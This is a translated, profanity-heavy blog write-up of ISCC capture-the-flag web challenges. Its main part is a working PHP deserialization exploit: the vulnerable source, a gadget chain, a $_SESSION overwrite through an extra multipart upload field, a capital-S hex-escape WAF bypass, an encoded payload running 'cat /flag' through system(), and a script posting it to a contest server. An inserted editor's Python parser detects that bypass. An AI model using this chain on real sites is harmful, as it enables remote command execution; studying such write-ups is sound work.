If I ever play ISCC again, I'm a fucking idiot.

Huh, there's no "again" for me anyway, so that's fine.

I thought there'd be some improvement this year, but it's the same as ever. I suggest renaming it PYCC; damn it, this is exactly how the culture gets ruined year after year.

Anyway it's all PY (backroom) deals; even full stack won't get you a prize. Updated irregularly.

Not updating Misc, nothing interesting there (actually I just can't do blockchain...).


I. Practice round (练武):

1. ISCC客服冲冲冲(一) (ISCC Customer Service, Charge! Part 1):

Sign-in challenge; in theory there are three ways to do it.

There's a function.js full of obfuscated JS code, so the first approach would be deobfuscating it?

The other two basically count as one: use the console.

Opening the page triggers an automatic debugger break; you can actually just spam-click.

A Baidu search turns up plenty of snippets for that:

setInterval(function(){document.getElementById("left_button").click();},1);

Of course you can also search in the Console; there's a votes variable, just set it directly and you're done.

2. 这是啥 (What is this):

What is this? What the fuck is this? Even freshman recruitment contests don't hand out this kind of challenge anymore.

3. Web01:

This one is a dumbass challenge too.

robots.txt gives the path /src/code/code.txt, but the source is actually at /code/code.txt:

<?php
if (isset($_GET['password'])) {

    if (preg_match("/^[a-zA-Z0-9]+$/", $_GET['password']) === FALSE)
    {
        echo '<p>You password must be alphanumeric</p>';
    }
    else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999)
    {
        if (strpos($_GET['password'], '*-*') !== FALSE)
        {
            die('Flag: ' . $flag);
        }
        else
        {
            echo('<p>*-* have not been found</p>');
        }
    }
    else
    {
        echo '<p>Invalid password</p>';
    }
}
?>

No thinking required; scientific notation gets straight past it.

4. 登陆 (Login):

Damn, this is the challenge I most want to rant about. If you can't write challenges, don't, okay?

First off, admin actually gets in with the weak password 123456; I'm fucking speechless. A QQ number and a phone number were hanging right there, so I figured it needed social engineering, but the image in the back end, once converted, is just the flag.

Then there's also a /www.zip; download it and it turns out to be 0CTF's piapiapia, not changed in the slightest. Unbelievable.

5. which is the true iscc:

This one at least took a bit of brains.

Source code audit:

<?php

session_start();
ini_set('max_execution_time', '5');
set_time_limit(5);

$status = "new";
$cmd = "whoami";
$is_upload = false;
$is_unser_finished = false;
$iscc_file = NULL;

class ISCC_Upload {

    function __wakeup() {
        global $cmd;
        global $is_upload;
        $cmd = "whoami";
        $_SESSION['name'] = randstr(14);
        $is_upload = (count($_FILES) > 0);
    }

    function __destruct() {
        global $is_upload;
        global $status;
        global $iscc_file;
        $status = "upload_fail";
        if ($is_upload) {

            foreach ($_FILES as $key => $value)
                $GLOBALS[$key] = $value;
        
            if(is_uploaded_file($iscc_file['tmp_name'])) {
                
                $check = @getimagesize($iscc_file["tmp_name"]);
                
                if($check !== false) {

                    $target_dir = "/var/tmp/";
                    $target_file = $target_dir . randstr(10);

                    if (file_exists($target_file)) {
                        echo "想啥呢?有东西了……<br>";
                        finalize();
                        exit;
                    }

                    if ($iscc_file["size"] > 500000) {
                        echo "东西塞不进去~<br>";
                        finalize();
                        exit;
                    }

                    if (move_uploaded_file($iscc_file["tmp_name"], $target_file)) {
                        echo "我拿到了!<br>";
                        $iscc_file = $target_file;
                        $status = "upload_ok";
                    } else {
                        echo "拿不到:(<br>";
                        finalize();
                        exit;
                    }

                } else {
                    finalize();
                    exit;
                }
                
            } else {
                echo "你真是个天才!<br>";
                finalize();
                exit;
            }
        }
    }
}

class ISCC_ResetCMD {

    protected $new_cmd = "echo '新新世界,发号施令!'";

    function __wakeup() {
        global $cmd;
        global $is_upload;
        global $status;
        $_SESSION['name'] = randstr(14);
        $is_upload = false;

        if(!isset($this->new_cmd)) {
            $status = "error";
            $error = "你这罐子是空的!";
            throw new Exception($error);   
        }

        if(!is_string($this->new_cmd)) {
            $status = "error";
            $error = '东西都没给对!';
            throw new Exception($error);
        }
    }

    function __destruct() {
        global $cmd;
        global $status;
        $status = "reset";
        if($_SESSION['name'] === 'isccIsCciScc1scc') {
            $cmd = $this->new_cmd;
        }
    }

}

class ISCC_Login {

    function __wakeup() {
        $this->login();
    }

    function __destruct() {
        $this->logout();
    }

    function login() {
        $flag = file_get_contents("/flag");
        $pAssM0rd = hash("sha256", $flag);
        if($_GET['pAssM0rd'] === $pAssM0rd)
            $_SESSION['name'] = "isccIsCciScc1scc";
    }

    function logout() {
        global $status;
        unset($_SESSION['name']);
        $status = "finish";
    }

}

class ISCC_TellMeTruth {

    function __wakeup() {
        if(!isset($_SESSION['name'])) 
            $_SESSION['name'] = randstr(14);
        echo "似乎这个 ".$_SESSION['name']." 是真相<br>";
    }

    function __destruct() {
        echo "似乎这个 ".$_SESSION['name']." 是真相<br>";
    }

}

class ISCC_Command {

    function __wakeup() {
        global $cmd;
        global $is_upload;
        $_SESSION['name'] = randstr(14);
        $is_upload = false;
        $cmd = "whoami";
    }

    function __toString() {
        global $cmd;
        return "看看你干的好事: {$cmd} <br>";
    }

    function __destruct() {
        global $cmd;
        global $status;
        global $is_unser_finished;
        $status = "cmd";
        if($is_unser_finished === true) {
            echo "看看你干的 [<span style='color:red'>{$cmd}</span>] 弄出了什么后果: ";
            echo "<span style='color:blue'>";
            @system($cmd);
            echo "</span>";
        }
    }

}

function randstr($len)
{
    $characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_=';
    $randstring = '';
    for ($i = 0; $i < $len; $i++) {
        $randstring .= $characters[rand(0, strlen($characters))];
    }
    return $randstring;
}

function waf($s) {
    if(stripos($s, "*") !== FALSE)
        return false;
    return true;
}

function finalize() {
    $cmd = "";
    $is_upload = false;
    unset($_SESSION);
    @unlink($iscc_file);
    $status = "finish";
    echo "<img src='whichisthetrueiscc.gif'><br>";
}


if(isset($_GET['whatareyounongshane'])) {
    $whatareyounongshane = $_GET['whatareyounongshane'];
    switch ($whatareyounongshane) {
        case "src":
            highlight_file(__FILE__);
            break;
        case "cmd":
            echo "想越级干好事?还是有门的……";
            header('Location: /?%3f=O:12:"ISCC_Command":0:{}');
            break;
        case "reset":
            echo "几辈子积累的好运就在这时~:p";
            header('Location: /?%3f=O:13:"ISCC_ResetCMD":1:{}');
            break;
        case "upload":
            $resp = <<<EOF
<form action="/index.php?%3f=O:11:%22ISCC_Upload%22:0:{}" method="post" enctype="multipart/form-data">
  <input type="file" name="iscc_file">
  <input type="submit" value="Upload Image" name="submit">
</form>
EOF;
            echo $resp;
            break;
        case "tellmetruth":
            echo base64_decode("PGltZyBzcmM9J3RlbGxtZXRydXRoLmdpZic+Cg==");
            header('Location: /?%3f=O:14:"ISCC_TellMeTruth":0:{}');
            break;
        default:
            echo "空空如也就是我!";
    }
    finalize();
    die("所以哪个ISCC是真的?<br>");
}

if(isset($_GET['?'])) {
    
    $wtf = waf($_GET{'?'}) ? $_GET['?'] : (finalize() && die("试试就“逝世”!"));
    
    if($goodshit = @unserialize($wtf)) {
        $is_unser_finished = true;
    }

    if(in_array($status, array('new', 'cmd', 'upload_ok', 'upload_fail', 'reset'), true))
        finalize();
    die("所以哪个ISCC是真的?<br>");
}

?>

The main logic is in ISCC_Command's __destruct():

function __destruct() {
    global $cmd;
    global $status;
    global $is_unser_finished;
    $status = "cmd";
    if($is_unser_finished === true) {
        echo "看看你干的 [<span style='color:red'>{$cmd}</span>] 弄出了什么后果: ";
        echo "<span style='color:blue'>";
        @system($cmd);
        echo "</span>";
    }
}

Look for where $cmd is set: it's in ISCC_ResetCMD's __destruct():

function __destruct() {
    global $cmd;
    global $status;
    $status = "reset";
    if($_SESSION['name'] === 'isccIsCciScc1scc') {
        $cmd = $this->new_cmd;
    }
}

So the key is $_SESSION['name']. Looking further, there's something in ISCC_Login:

function login() {
    $flag = file_get_contents("/flag");
    $pAssM0rd = hash("sha256", $flag);
    if($_GET['pAssM0rd'] === $pAssM0rd)
        $_SESSION['name'] = "isccIsCciScc1scc";
}

But that's a trap; obviously this can't be reached through login(), so where then?

In ISCC_Upload's __destruct():

foreach ($_FILES as $key => $value)
    $GLOBALS[$key] = $value;

So when uploading the image, just send an extra text part along with it to overwrite it.

Something like this:

Content-Disposition: form-data; name="_SESSION"; filename="isccIsCciScc1scc"
Content-Type: text/plain

1ndweb

Now for the serialization order.

From the analysis it's clear only 3 classes are needed, so just chain them like this:

ISCC_Upload() => ISCC_ResetCMD() => ISCC_Command()

Then there's the waf():

Bypass it with a capital S plus hex encoding.

<?php

class ISCC_Upload {
    public $status;
}

class ISCC_Command {

}

class ISCC_ResetCMD {
    public $cmd;
    public $status;
    protected $new_cmd = "cat /flag";
}

// Nest the three objects so the destructors fire in the needed order:
// ISCC_Upload (overwrite $_SESSION) => ISCC_ResetCMD (set $cmd) => ISCC_Command (run $cmd)
$a = new ISCC_Upload();
$a->status = new ISCC_ResetCMD();
$a->status->cmd = new ISCC_Command();
$b = serialize($a);

// waf() rejects a literal '*', and the protected property serializes as s:10:"\0*\0new_cmd".
// Switch that string to the capital-S form, where '*' can be written as the hex escape \2a.
$b = str_replace('s:10:"' . "\0*\0" . 'new_cmd"', 'S:10:"' . "\0\\2a\0" . 'new_cmd"', $b);
echo urlencode($b);

// Final payload (every s: written as S:, which unserialize() accepts just the same):
// ?%3F=O%3A11%3A%22ISCC_Upload%22%3A1%3A%7BS%3A6%3A%22status%22%3BO%3A13%3A%22ISCC_ResetCMD%22%3A2%3A%7BS%3A10%3A%22%00%5C2a%00new_cmd%22%3BS%3A9%3A%22cat+%2Fflag%22%3BS%3A6%3A%22status%22%3BO%3A12%3A%22ISCC_Command%22%3A0%3A%7B%7D%7D%7D
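An added example from the editor, not the write-up's code: the challenge's waf() only looks for a literal '*' in the raw query value, so the S: string form, which lets any byte be written as a backslash-hex escape, slips past it. The parser below walks PHP serialize() output, decodes both s: and S: strings, and re-applies the '*' rule to what unserialize() would actually produce; decode_query mirrors how PHP fills $_GET (percent-decoding, '+' as space), and the payload above is used as input.

```python
from urllib.parse import unquote_to_bytes
# The write-up's final payload, copied from the query string above.
PAYLOAD = ("O%3A11%3A%22ISCC_Upload%22%3A1%3A%7BS%3A6%3A%22status%22%3BO%3A13%3A%22ISCC_ResetCMD%22"
           "%3A2%3A%7BS%3A10%3A%22%00%5C2a%00new_cmd%22%3BS%3A9%3A%22cat+%2Fflag%22%3BS%3A6%3A"
           "%22status%22%3BO%3A12%3A%22ISCC_Command%22%3A0%3A%7B%7D%7D%7D")

def decode_query(query_value: str) -> bytes:
    """What PHP puts in $_GET['?']: percent-decoded bytes, with '+' read as a space."""
    return unquote_to_bytes(query_value.replace("+", " "))

def raw_waf(data: bytes) -> bool:
    """Same rule as the challenge's waf(): reject only a literal '*' in the raw bytes."""
    return b"*" not in data

def parse(data: bytes, i: int, out: list) -> int:
    """Walk one serialized value at data[i], collecting class names and decoded strings."""
    t = data[i:i + 1]
    if t in (b"N", b"i", b"b", b"d"):               # N;  i:42;  b:1;  d:1.5;
        return data.index(b";", i) + 1
    if t in (b"s", b"S"):                           # s:len:"raw";  S:len:"esc\2aped";
        j = data.index(b":", i + 2)
        n, j, buf = int(data[i + 2:j]), j + 2, bytearray()
        while len(buf) < n:                         # len counts decoded bytes
            if t == b"S" and data[j:j + 1] == b"\\":
                buf.append(int(data[j + 1:j + 3], 16))   # \2a -> '*'
                j += 3
            else:
                buf.append(data[j])
                j += 1
        out.append(bytes(buf))
        return j + 2                                # skip the closing ";
    if t in (b"a", b"O"):                           # a:n:{...}  O:len:"Class":n:{...}
        j = i + 2
        if t == b"O":
            k = data.index(b":", j)
            clen, j = int(data[j:k]), k + 2
            out.append(data[j:j + clen])
            j += clen + 2                           # skip ":
        k = data.index(b":", j)
        count, j = int(data[j:k]), k + 2            # skip :{
        for _ in range(2 * count):                  # count key/value pairs
            j = parse(data, j, out)
        return j + 1                                # skip }
    raise ValueError(f"unsupported type {t!r} at offset {i}")

def decoded_waf(query_value: str) -> bool:
    """Apply the '*' rule to what unserialize() will actually produce."""
    strings: list = []
    parse(decode_query(query_value), 0, strings)
    return all(b"*" not in s for s in strings)
```

raw_waf() lets the payload through while decoded_waf() rejects it, because the decoded property name is "\0*\0new_cmd"; the harmless O:12:"ISCC_Command":0:{} the site itself redirects to passes both.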

Just write a script and run it:

import requests

targeturl = "http://39.96.91.106:7050/"

# Multipart body: the real image goes in iscc_file (it has to pass getimagesize()),
# plus an extra part named _SESSION whose filename ends up in $_SESSION['name']
# through the $GLOBALS[$key] = $value loop in ISCC_Upload::__destruct().
files = {
    'iscc_file': ("b", open("1.jpg", "rb")),
    "_SESSION": ("isccIsCciScc1scc", "1ndweb"),
}

headers = {
    'Cookie': "PHPSESSID=fe2967c292ff6fcc72f8c2b73970fb2f",
}

# The serialized chain from above goes in the '?' query parameter.
payload = ("O%3A11%3A%22ISCC_Upload%22%3A1%3A%7BS%3A6%3A%22status%22%3BO%3A13%3A%22ISCC_ResetCMD%22"
           "%3A2%3A%7BS%3A10%3A%22%00%5C2a%00new_cmd%22%3BS%3A9%3A%22cat+%2Fflag%22%3BS%3A6%3A"
           "%22status%22%3BO%3A12%3A%22ISCC_Command%22%3A0%3A%7B%7D%7D%7D")

r = requests.post(url=targeturl + "?%3F=" + payload, files=files, headers=headers)

print(r.text)

II. Arena stage (擂台赛):

1. tornado:

What the hell, recycling a challenge from the 2018 护网杯 (Huwang Cup) to pad it out? If that's how it is, wouldn't it be better if I put up foreign CTF challenges? Hardly anyone plays them anyway, and Baidu can't even find them.

